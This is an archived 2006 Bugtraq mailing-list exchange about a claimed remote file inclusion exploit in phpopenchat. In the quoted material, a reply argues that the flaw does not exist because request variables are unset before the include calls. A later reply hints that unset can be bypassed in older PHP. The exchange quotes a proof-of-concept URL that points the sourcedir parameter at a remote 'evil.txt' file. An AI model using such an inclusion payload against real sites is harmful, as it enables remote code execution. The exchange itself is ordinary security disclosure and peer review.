lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <200609080114.k881EToo005106@post.webmailer.de>
Date: Fri, 8 Sep 2006 03:14:15 +0200
From: Frank Reißner <mail@...nk-reissner.de>
To: "'Carsten Eilers'" <ceilers-lists@....de>,
	<bugtraq@...urityfocus.com>
Subject: AW: WDT :-phpopenchat-3.0.*  ($sourcedir) Remote File Inclusion Exploit

You can bypass unset in php < 4.4.4 and < 5.14. :)   

-----Ursprüngliche Nachricht-----
Von: Carsten Eilers [mailto:ceilers-lists@....de] 
Gesendet: Freitag, 8. September 2006 00:18
An: stormhacker@...mail.com; bugtraq@...urityfocus.com
Betreff: Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion
Exploit

Hi,

stormhacker@...mail.com schrieb am Wed, 6 Sep 2006 19:17:11 +0000:

>-----------------Description---------------
>
>
>include_once("QueryString.php");
>
>include_once("Settings.php");
>
>include_once("$sourcedir/Subs.php");
>
>include_once("$sourcedir/Errors.php");
>
>include_once("$sourcedir/Load.php");
>
>//include_once("$sourcedir/Security.php");

Nice.

But you forgot the three little line above of this:

| $givenParams = array_keys($_REQUEST);
| foreach($givenParams as $param )
|  unset(${$param});

And this...

>--------------PoC/Exploit----------------------
>
>
>http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://
>host/evil.txt?

... unsets your set sourcedir.
Result: There is no vulnerability.

Maybee $sourcedir is set/manipulated in QueryString.php
or Settings.php, but these script see nothing about your
manipulated sourcedir since it's unset before the includes.

>--------------Solution---------------------
>
>
>No Patch available.

No patch necessary.

Regards
  Carsten

-- 
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

<http://www.ceilers-it.de>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ